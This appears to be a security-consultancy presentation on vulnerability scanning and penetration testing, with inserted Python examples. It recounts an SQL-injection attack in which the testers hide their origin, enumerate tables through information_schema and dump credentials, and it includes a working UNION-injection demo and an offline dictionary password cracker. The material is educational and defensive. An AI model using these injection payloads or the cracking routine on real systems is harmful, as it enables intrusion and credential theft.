Vulnerability Assessment and Penetration Testing




Presenters:
Bruce Upton, CISSP, CISA, C|EH, bruce.upton@protectmybank.com
Jerry McClurg, CISSP, CISA, C|EH, jerry.mcclurg@protectmybank.com

Agenda and Overview
Vulnerability scanning and identification:
- What is a vulnerability assessment?
- Internal versus external scanning and testing
- How are vulnerability tests different from penetration tests?
- Vulnerability scanning tools and reporting
Additional considerations:
- Understanding that vulnerability assessments and penetration tests are only valid for a short period of time
- Continuous monitoring
- Management oversight

What's the Difference? Vulnerability Identification versus Penetration Testing
- Vulnerability assessment: generally an automated scan of network resources that produces a detailed report of security vulnerabilities. It tells you what could be exploited, not whether it actually can be.
- Penetration test: incorporates vulnerability scanning and identification, then applies additional, largely manual, effort to exploit the identified vulnerabilities, chain them together and demonstrate real impact.
- Vulnerability assessments and penetration tests are both good security due diligence: the assessment is broader and cheap to repeat, the penetration test is deeper and shows which findings actually matter.

What's the Difference? Vulnerability Identification versus Penetration Testing
A vulnerability assessment may identify the following security weaknesses:
- Users have local administrator rights on their Windows 7 computers.
- Users can access most websites on the Internet.
- Users have the authority to run programs from within Internet Explorer.
A penetration test would identify the same weaknesses, but go quite a bit further by chaining them into an attack:
- Users have local administrator rights on their Windows 7 computers.
- Users can access most websites on the Internet.
- Users have the authority to run programs from within Internet Explorer.
- A user was convinced to visit a phishing website.
- The user ran a connection-test application (a harmless program that connects back to the testers, standing in for real malware).
- Symantec Antivirus did not detect the connection-test application.
- Unauthorized remote access was obtained into the network.

Internal versus External
Generally speaking, there are two types of assessments.
Internal assessment: the vulnerability scan or penetration test is performed from inside the organization. The engineer(s) either physically visit the organization or are given secure remote access. The test simulates an attack from the inside out (a malicious insider, or an outside attacker who has already gained a foothold). This approach will:
- Identify internal devices (enumeration)
- Identify services and footprint internal devices
- Identify internal security weaknesses in, at a minimum, the following categories: patch management, network segregation, network access controls, data security, intrusion detection system (IDS) testing, SCADA (if in scope), key management and crypto security (if in scope), password practices, and overall PC, server and network device security due diligence

Internal versus External
External assessment: the vulnerability scan or penetration test is performed from outside the organization. The engineer(s) test the organization's infrastructure using an outside-in approach, with no more access than an Internet attacker has. This approach will:
- Identify external devices (enumeration)
- Identify services and footprint external devices
- Identify external security weaknesses in, at a minimum, the following categories: firewall security, remote access portals, database management system (DBMS) security, web application security, intrusion detection system (IDS) and intrusion prevention system (IPS) testing
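The enumeration and footprinting steps above usually start from a port scanner's output. As an added example (not code from the presentation), the script below parses an nmap XML report into a host/service inventory and sorts the open services into the external-assessment categories the slide names. The XML is constructed to resemble real nmap -oX output; the addresses, hostnames and versions are made up, and the port-to-category groupings are an assumption for illustration rather than a standard.

```python
"""Turn an nmap XML scan (nmap -sV -oX) into a host/service inventory and
flag the service classes an external assessment looks at first.

Added example, not from the presentation. The XML below is constructed to
look like real nmap output; hosts, addresses and versions are made up.
"""
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sV -oX scan.xml 203.0.113.0/29` emits.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 203.0.113.0/29">
  <host>
    <status state="up"/>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <hostnames><hostname name="www.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="443"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.7.33"/></port>
      <port protocol="tcp" portid="23"><state state="filtered"/>
        <service name="telnet"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="203.0.113.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="203.0.113.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Port groupings for the external categories named on the slide.
# Assumption for illustration: adjust to the engagement's scope.
CATEGORIES = {
    "remote access portal": {22, 23, 3389, 5900},
    "DBMS": {1433, 1521, 3306, 5432, 27017},
    "web application": {80, 443, 8080, 8443},
}

def parse_nmap_xml(xml_text):
    """Return {ip: {"hostname": str|None, "services": [(port, name, product, version)]}}
    for hosts reported up. Only open ports are kept (filtered/closed are noise here)."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        hn = host.find("hostnames/hostname")
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            services.append((int(port.get("portid")), get("name"), get("product"), get("version")))
        inventory[addr.get("addr")] = {
            "hostname": hn.get("name") if hn is not None else None,
            "services": sorted(services),
        }
    return inventory

def categorize(inventory):
    """Map each open service onto a category; anything else lands in "other"."""
    result = {cat: [] for cat in CATEGORIES}
    result["other"] = []
    for ip, info in inventory.items():
        for port, name, _product, _version in info["services"]:
            for cat, ports in CATEGORIES.items():
                if port in ports:
                    result[cat].append((ip, port, name))
                    break
            else:
                result["other"].append((ip, port, name))
    return result

def exposed_dbms(inventory):
    """Database listeners reachable from the Internet are rarely intentional."""
    return [(ip, port) for ip, info in inventory.items()
            for port, *_ in info["services"] if port in CATEGORIES["DBMS"]]

if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, info in inv.items():
        print(ip, info["hostname"] or "-")
        for port, name, product, version in info["services"]:
            print(f"  {port:>5}/tcp {name:<14} {product} {version}".rstrip())
    for cat, items in categorize(inv).items():
        print(cat, items)
```

The filtered telnet port is dropped on purpose: for footprinting, only what answers matters, and the MySQL listener on the web host is the kind of finding the DBMS category exists to surface.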

Testing Quality: testing quality and effectiveness
The overall effectiveness of an assessment is generally based on three main factors:
- The effectiveness and thoroughness of the scanning toolset(s)
- The overall quality and talent of the internal and/or external security firm or personnel (certifications, experience, etc.)
- How effectively the security firm and internal departments work together: a free flow of information between the firm and key departments is central to the success of an assessment

Toolsets: vulnerability scanning toolsets
The effectiveness and thoroughness of a vulnerability assessment is heavily based on toolsets. Some effective toolsets include:
- Qualys: internal and external vulnerability scanning; low false-positive rates; pay-per-IP model
- Rapid7: internal and external vulnerability scanning; low false-positive rates; pay-per-IP model
- Nessus: internal and external vulnerability scanning; effective pricing model; in our experience, Nessus tends to have a higher false-positive rate
- Nexpose: internal and external vulnerability scanning; community edition available; low false-positive rates

Toolsets: Qualys
- Enterprise scanning tool with a number of compliance modules
- Reporting, remediation tracking and a large knowledge base

Toolsets: Qualys
Advantages:
- Low false-positive rates
- Detailed reporting
- Remediation tracking
- Most vulnerabilities identified will have resolution strategies
Disadvantages:
- All scan data is stored in the cloud at Qualys
- Pay-per-IP model makes scanning large IP blocks very expensive

Toolsets: Nexpose
- Enterprise-class, with a low false-positive rate, strong reporting and numerous compliance templates
- Extensive compliance and simulation testing

Toolsets: Nexpose
Advantages:
- Low false-positive rates
- Detailed reporting
- Many compliance and simulation scan templates
- Most vulnerabilities identified will have resolution strategies
- Not a pay-per-IP scanning solution, potentially making it a good fit for internal scanning and testing
Disadvantages:
- Like most vulnerability scanners it generates a lot of network traffic. It can cause network latency or a denial of service if it is not configured properly: set scan windows and rate limits, and exclude or scan gently fragile devices such as printers, medical equipment and SCADA controllers.
- Resource intensive
- Pricey, at about $10,000 to $15,000 depending on the scope and services needed

Tool Availability
Overall, we are seeing two concerning trends today:
The availability of hacking tools is unprecedented. Free tools exist to:
- Exploit websites
- Identify vulnerabilities
- Perform data mining
- Hack wireless networks, etc.
Tools available to hide your tracks and/or become virtually invisible are at an all-time high. Examples include:
- VPN solutions that don't keep long-term logs, such as proXPN
- Tor: "Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security" (torproject.org)
The world has learned just how effective Tor is: the Snowden leaks indicated the NSA had not broken Tor itself, only worked around it (for example by attacking the user's browser rather than the network).

Why are we concerned?
The following attack was performed using publicly available software, and our origin was successfully masked.
First step: go dark (anonymous) to obscure where your Internet traffic is originating from. In our case, it looks like we are coming from Germany.
An outside-in approach was used, and it started with Google hacking: search queries that surface pages whose URLs and error messages suggest unvalidated parameters. The hacker identifies a target (neither of the websites shown was used in our demonstration).

Why are we concerned?
A quote character is appended to a URL parameter to probe for an SQL-injection vulnerability. Inserting the string generated a database error.
The error message tells us the page is likely vulnerable to an SQL-injection attack, because the application is passing our input straight into its query and echoing the database's complaint back to us. Further testing reveals it is, and the following information is initially obtained via SQL-injection strings:

Why are we concerned?
SQL-injection strings are used to extract information step by step. The 0x... values below are MySQL hexadecimal string literals; they let the payload name a schema or table without quote characters, which the application or a filter might strip or escape.
Database table names are obtained from the catalog:
Count(table_name) of information_schema.tables where table_schema=0x67656d656469615f7073 is 27
Note the users table.
Table field names are extracted from the users table:
Count(column_name) of information_schema.columns where table_schema=0x67656d656469615f7073 and table_name=0x7573657273 is 13
Username and password field data are extracted from the users table:
Count(*) of XXXXXXXX_ps.users is 4
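The same sequence (quote, database error, enumerate tables, enumerate columns, dump the users table) can be reproduced against a small vulnerable query, beside the parameterized version that stops it. This is an added example, not code from the presentation or from the site it tested: the schema, rows and passwords are constructed, and SQLite's sqlite_master and pragma_table_info stand in for the MySQL information_schema tables queried on the slides.

```python
"""The slide's attack sequence against a deliberately vulnerable query, next
to the parameterized query that stops it.

Added example, not code from the presentation. The schema, rows and
passwords are constructed; SQLite's sqlite_master and pragma_table_info
play the role MySQL's information_schema played on the slides.
"""
import hashlib
import sqlite3

def build_db():
    """Constructed sample: a product table the page looks up by id and a
    users table whose passwords are unsalted MD5 hashes."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
    """)
    for uid, name, pw in [(1, "admin", "Winter2013"), (2, "jsmith", "letmein")]:
        con.execute("INSERT INTO users VALUES (?, ?, ?)",
                    (uid, name, hashlib.md5(pw.encode()).hexdigest()))
    return con

def product_vulnerable(con, product_id):
    """The defect: the request parameter is concatenated into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE id = {product_id}"
    return con.execute(sql).fetchall()

def product_safe(con, product_id):
    """The fix: a bound parameter is always data, never SQL."""
    return con.execute("SELECT name, price FROM products WHERE id = ?",
                       (product_id,)).fetchall()

def probe(con, query_fn):
    """Step 1 on the slide: send a lone quote and see whether the backend
    leaks a database error. Returns the error text, or None if no error."""
    try:
        query_fn(con, "1'")
    except sqlite3.Error as exc:
        return str(exc)
    return None

def union_extract(con, query_fn, expression, from_clause):
    """UNION-based extraction. The original SELECT returns two columns, so
    the injected SELECT pads its second column with NULL; id = 0 empties the
    legitimate result so only injected rows come back."""
    payload = f"0 UNION SELECT {expression}, NULL {from_clause}"
    return [row[0] for row in query_fn(con, payload)]

def dump_via_injection(con, query_fn=product_vulnerable):
    """Steps 2-4 on the slide: tables, then the columns of users, then its rows."""
    tables = union_extract(con, query_fn, "name",
                           "FROM sqlite_master WHERE type = 'table'")
    columns = union_extract(con, query_fn, "name",
                            "FROM pragma_table_info('users')")
    creds = union_extract(con, query_fn, "username || ':' || password",
                          "FROM users")
    return tables, columns, creds

def mysql_hex_literal(s):
    """MySQL accepts 0x... as a string literal. The slide's payloads use this
    form so the schema and table names contain no quote characters."""
    return "0x" + s.encode().hex()

if __name__ == "__main__":
    con = build_db()
    print("error leaked:", probe(con, product_vulnerable))
    print("dump:", dump_via_injection(con))
    print("same payloads against the fixed query:", dump_via_injection(con, product_safe))
    print("users as a MySQL hex literal:", mysql_hex_literal("users"))
```

Against product_safe the very same payloads return nothing and the quote probe raises no error, which is the whole point of binding parameters; on a real MySQL target the from_clause would name information_schema.tables and information_schema.columns as on the slides.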

Why are we concerned? Data extraction
Testing revealed the passwords are encrypted. How are they encrypted? How do we find out? Is there a way to decrypt them?

Why are we concerned? Password decryption
Stored passwords are normally hashed rather than reversibly encrypted, so "decryption" here means guessing candidate passwords, hashing each one the same way and comparing. There are a number of offline tools, such as Hashcat and L0phtCrack, that launch brute-force or dictionary attacks against the hashes, and a number of websites specialize in lookups of precomputed hashes of common passwords:
- Cloudcracker.com
- Crackstation.net
- md5decrypter.co.uk
Unsalted, fast hashes such as MD5 and SHA-1 fall to these in seconds; salted, deliberately slow schemes such as bcrypt, scrypt or PBKDF2 do not, which is why the storage scheme is the first thing to identify.
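The two questions on the slide (how are they hashed, and can we recover them) map onto two small routines. As an added example that is not part of the presentation, the script below identifies a hash by its shape and then runs a dictionary attack against it offline, the way Hashcat or a lookup site would. The three hashes and the short wordlist are constructed here so it runs without network access; a real engagement feeds a cracker a large wordlist and the hashes pulled from the database.

```python
"""Identify a dumped password hash by its shape, then run a dictionary attack
against it offline, the way Hashcat or a lookup site would.

Added example, not from the presentation. The three hashes and the short
wordlist are constructed here so the script runs offline.
"""
import hashlib
import re

# Shape-based identification. Length and charset cannot distinguish MD5 from
# NTLM (both 32 hex chars), so the result is a list of candidates.
HEX_CANDIDATES = {32: ["md5", "ntlm"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}
PREFIX_CANDIDATES = [
    (re.compile(r"^\$2[aby]\$\d\d\$"), "bcrypt"),
    (re.compile(r"^\$1\$"), "md5crypt"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
    (re.compile(r"^\{SHA\}"), "ldap-sha1"),
]

def identify(h):
    """Candidate algorithm names for a hash string (empty list if unknown)."""
    for pattern, name in PREFIX_CANDIDATES:
        if pattern.match(h):
            return [name]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return list(HEX_CANDIDATES.get(len(h), []))
    return []

def dictionary_attack(hashes, wordlist, computable=("md5", "sha1", "sha256", "sha512")):
    """For each hash, hash every word under each candidate algorithm and
    compare. Returns {hash: (algorithm, password)} for those recovered.
    Candidates hashlib cannot compute here (e.g. ntlm) are skipped."""
    found = {}
    for h in hashes:
        target = h.lower()
        for algo in identify(h):
            if algo not in computable:
                continue
            for word in wordlist:
                if hashlib.new(algo, word.encode()).hexdigest() == target:
                    found[h] = (algo, word)
                    break
            if h in found:
                break
    return found

# Constructed "dump": unsalted MD5, unsalted SHA-1, and a SHA-256 of a
# password that is not in the wordlist (the one the slide did not recover).
DUMPED_HASHES = [
    hashlib.md5(b"Winter2013").hexdigest(),
    hashlib.sha1(b"letmein").hexdigest(),
    hashlib.sha256(b"k7#Qv!9zLm2pX").hexdigest(),
]
WORDLIST = ["password", "123456", "qwerty", "letmein", "Summer2013", "Winter2013", "welcome1"]

if __name__ == "__main__":
    for h in DUMPED_HASHES:
        print(h, "->", identify(h))
    for h, (algo, pw) in dictionary_attack(DUMPED_HASHES, WORDLIST).items():
        print(f"cracked {h[:12]}... as {algo}: {pw}")
```

Two of the three come back, as on the slide. The third survives only because its password is not in the list; with a salted, slow hash it would also survive a large list, because each guess costs milliseconds instead of nanoseconds and precomputed lookup tables do not apply.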

Why are we concerned? Password decryption
We were able to successfully identify how the passwords were encrypted, and we were able to decrypt two of three.

Why are we concerned? Malicious intent
We stopped testing at this point, but unfortunately, most blackhat hackers would not. Web anonymity is a great way to encourage Internet privacy. However, the tools that protect our Internet privacy are being used maliciously by hackers to cover their tracks.

Additional Considerations: vulnerability and penetration testing frequency
Vulnerability assessments and penetration tests are only valid for a short period of time. For example, the second Tuesday of every month is Microsoft's Patch Tuesday, and the day after is known as Exploit Wednesday: attackers reverse-engineer the released patches to build exploits for systems that have not yet been updated. A scan taken before a patch cycle says nothing about the vulnerabilities disclosed in it. To address these gaps in time, continuous monitoring systems can be implemented:
- Bit9 Parity
- Tripwire
- FireMon

Additional Considerations: assess and identify all ports, programs and services
The programs we have discussed should identify all active ports and services. What about installed software that is not currently listening, or inactive processes? A vulnerable package that is installed but not running will not show up in a network scan, yet it is still one update or one service start away from being exploitable. Tools that identify all installed software:
- Microsoft Assessment and Planning (MAP) Toolkit
- EMCO Network Software Scanner
Try to use at least two programs and check their results against each other.
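Both of the considerations above reduce to checks that are easy to automate: has a patch cycle passed since the last assessment, and do two inventory sources agree on what is on each host? The script below is an added example, not from the presentation. The two inventories are constructed to resemble the output of two different tools (or of one tool at two points in time); host names, ports and package versions are made up, and the Patch Tuesday dates it computes are checked against real 2013/2014 dates.

```python
"""Two checks behind the 'additional considerations' slides: has a Patch
Tuesday passed since the last assessment, and do two inventory sources agree
on what is running on each host?

Added example, not from the presentation. The inventories are constructed to
resemble two tools' output for the same hosts; names and versions are made up.
"""
from datetime import date, timedelta

def patch_tuesday(year, month):
    """Second Tuesday of the month: Microsoft's monthly update day."""
    first = date(year, month, 1)
    first_tuesday = first + timedelta(days=(1 - first.weekday()) % 7)  # Mon=0, Tue=1
    return first_tuesday + timedelta(days=7)

def last_patch_tuesday(as_of):
    """Most recent Patch Tuesday on or before as_of."""
    this_month = patch_tuesday(as_of.year, as_of.month)
    if this_month <= as_of:
        return this_month
    end_of_prev = as_of.replace(day=1) - timedelta(days=1)
    return patch_tuesday(end_of_prev.year, end_of_prev.month)

def scan_is_stale(scan_date_iso, as_of_iso):
    """True when a Patch Tuesday (and its Exploit Wednesday) has come and gone
    since the scan: its findings no longer describe the current patch state."""
    scan = date.fromisoformat(scan_date_iso)
    as_of = date.fromisoformat(as_of_iso)
    return scan < last_patch_tuesday(as_of)

# Constructed: listening ports and installed software per host, as reported
# by source A (say, a network scanner) and source B (an agent-based software
# inventory) on the same day.
SOURCE_A = {
    "srv01": {"ports": {22, 80, 443},
              "software": {"openssh 8.2", "nginx 1.18.0", "postgresql 13.4"}},
    "srv02": {"ports": {22, 3389}, "software": {"openssh 8.2"}},
}
SOURCE_B = {
    "srv01": {"ports": {22, 80, 443, 5432},
              "software": {"openssh 8.2", "nginx 1.18.0", "postgresql 13.4", "anydesk 6.1"}},
    "srv02": {"ports": {22, 3389}, "software": {"openssh 8.2"}},
    "srv03": {"ports": {22}, "software": {"openssh 7.4"}},
}

def compare_inventories(src_a, src_b):
    """Cross-check two inventories of the same estate. Returns a list of
    (host, kind, detail) findings for the tracking sheet: hosts one source
    missed entirely, and ports or packages only one source reports."""
    findings = []
    for host in sorted(set(src_a) | set(src_b)):
        if host not in src_a or host not in src_b:
            findings.append((host, "coverage gap", "seen by only one source"))
            continue
        for key in ("ports", "software"):
            a, b = set(src_a[host].get(key, ())), set(src_b[host].get(key, ()))
            findings += [(host, f"{key} only in A", str(x)) for x in sorted(a - b, key=str)]
            findings += [(host, f"{key} only in B", str(x)) for x in sorted(b - a, key=str)]
    return findings

if __name__ == "__main__":
    print("scan of 2014-01-10 stale on 2014-01-23?", scan_is_stale("2014-01-10", "2014-01-23"))
    for finding in compare_inventories(SOURCE_A, SOURCE_B):
        print(*finding, sep=" | ")
```

Every disagreement is a finding in its own right: a port one tool saw and the other did not means a service started between runs or a scanner that was rate-limited; a host only one source knows about is a coverage gap that invalidates "we scanned everything".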


Additional Considerations: assessment plan
Start from the external view and look at the information from a hacker's viewpoint:
- Domain and DNS registration
- Gateway routers, IDS, firewalls
- Email and DMZ devices
Then move to the internal network:
- Internal/rogue user access
- Vendor/visitor access
- Remote access

Additional Considerations: document and track open issues
Findings are easy to lose track of without tracking and follow-up. Schedule regular progress updates and report to management.

Summary and Take-Aways
- Document and follow an assessment plan
- Maintain multiple software toolsets
- Stay engaged: technology security is a moving target

Questions?